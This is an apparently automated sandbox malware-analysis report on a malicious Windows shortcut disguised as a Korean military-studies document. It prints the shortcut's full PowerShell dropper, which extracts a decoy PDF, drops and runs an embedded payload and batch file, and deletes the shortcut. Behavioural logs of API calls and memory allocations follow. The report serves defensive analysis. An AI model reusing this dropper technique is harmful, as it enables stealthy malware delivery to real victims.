Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 3, 2025, 10:39 a.m.	April 3, 2025, 10:39 a.m.

Size	49.4MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`2f431c4e65af9908d2182c6a093bf262`
SHA256	`d182834a984c9f5b44ea0aca5786223a78138ff23d33362ab699c76bf6987261`
CRC32	`9A18ABB0`
ssdeep	`98304:bgtB2Z8ODns956f6azRvLy+cqGHntKZiCG5YPYH+:b5ns6HcHtKZiC2lH+`
Yara	PDF_Suspicious_Link_Z - PDF Suspicious Link Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\한국군사학논총.lnk
2544
- cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"&& exit
  2656
  - cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
    2760
  - powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);"
    2812

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2025, 10:39 a.m.			0	0

Command line console output was observed (30 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: call console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extension -in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').GetString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp+'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-File -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[System.IO.File]::Delete($lnkPath);" console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: You must provide a value expression on the right-hand side of the '-' operator. console_handle: 0x00000023	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: At line:1 char:240 console_handle: 0x0000002f	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: + $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'P console_handle: 0x0000003b	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: rogram Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'};$exs=@('.lnk') console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: ;$lnkPath = Get-ChildItem -Path $dirPath -Recurse . -File \| where {$_.extensi console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: on - <<<< in $exs} \| where-object {$_.length -eq 0x031732EF} \| Select-Object -E console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: xpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [Sys console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: tem.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile. console_handle: 0x00000083	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pd console_handle: 0x0000008f	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: fPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x002A8A49,[System.IO.Se console_handle: 0x0000009b	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: ekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9190;$lnkFile.Read($exeFile, console_handle: 0x000000a7	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: 0, 0x000D9190);$exePath=$env:temp+'\toy01.dat';sc $exePath $exeFile -Encoding console_handle: 0x000000b3	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: Byte;$lnkFile.Seek(0x00381BD9,[System.IO.SeekOrigin]::Begin);$stringByte = New- console_handle: 0x000000bf	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: Object byte[] 0x00000634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath console_handle: 0x000000cb	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: = $env:temp+'\'+'toy02.dat';$string = [Text.Encoding]::GetEncoding('utf-8').Ge console_handle: 0x000000d7	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: tString($stringByte);$string \| Out-File -FilePath $batStrPath -Encoding ascii;$ console_handle: 0x000000e3	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: lnkFile.Seek(0x0038220D,[System.IO.SeekOrigin]::Begin);$batByte = New-Object by console_handle: 0x000000ef	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: te[] 0x0000014C;$lnkFile.Read($batByte, 0, 0x0000014C);$executePath = $env:temp console_handle: 0x000000fb	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: +'\'+'toy0'+'3.b'+'a'+'t'; Write-Host $executePath; Write-Host $batStrPath; $ba console_handle: 0x00000107	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: stString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString \| Out-F console_handle: 0x00000113	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: ile -FilePath $executePath -Encoding ascii; &$executePath; $lnkFile.Close();[Sy console_handle: 0x0000011f	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: stem.IO.File]::Delete($lnkPath); console_handle: 0x0000012b	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx console_handle: 0x00000137	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: ception console_handle: 0x00000143	1	1
WriteConsoleW April 3, 2025, 10:39 a.m.	buffer: + FullyQualifiedErrorId : ExpectedValueExpression console_handle: 0x0000014f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00244fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00244f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00244f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00244f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00245bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2025, 10:39 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 144 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02992000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:39 a.m.	process_identifier: 2812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
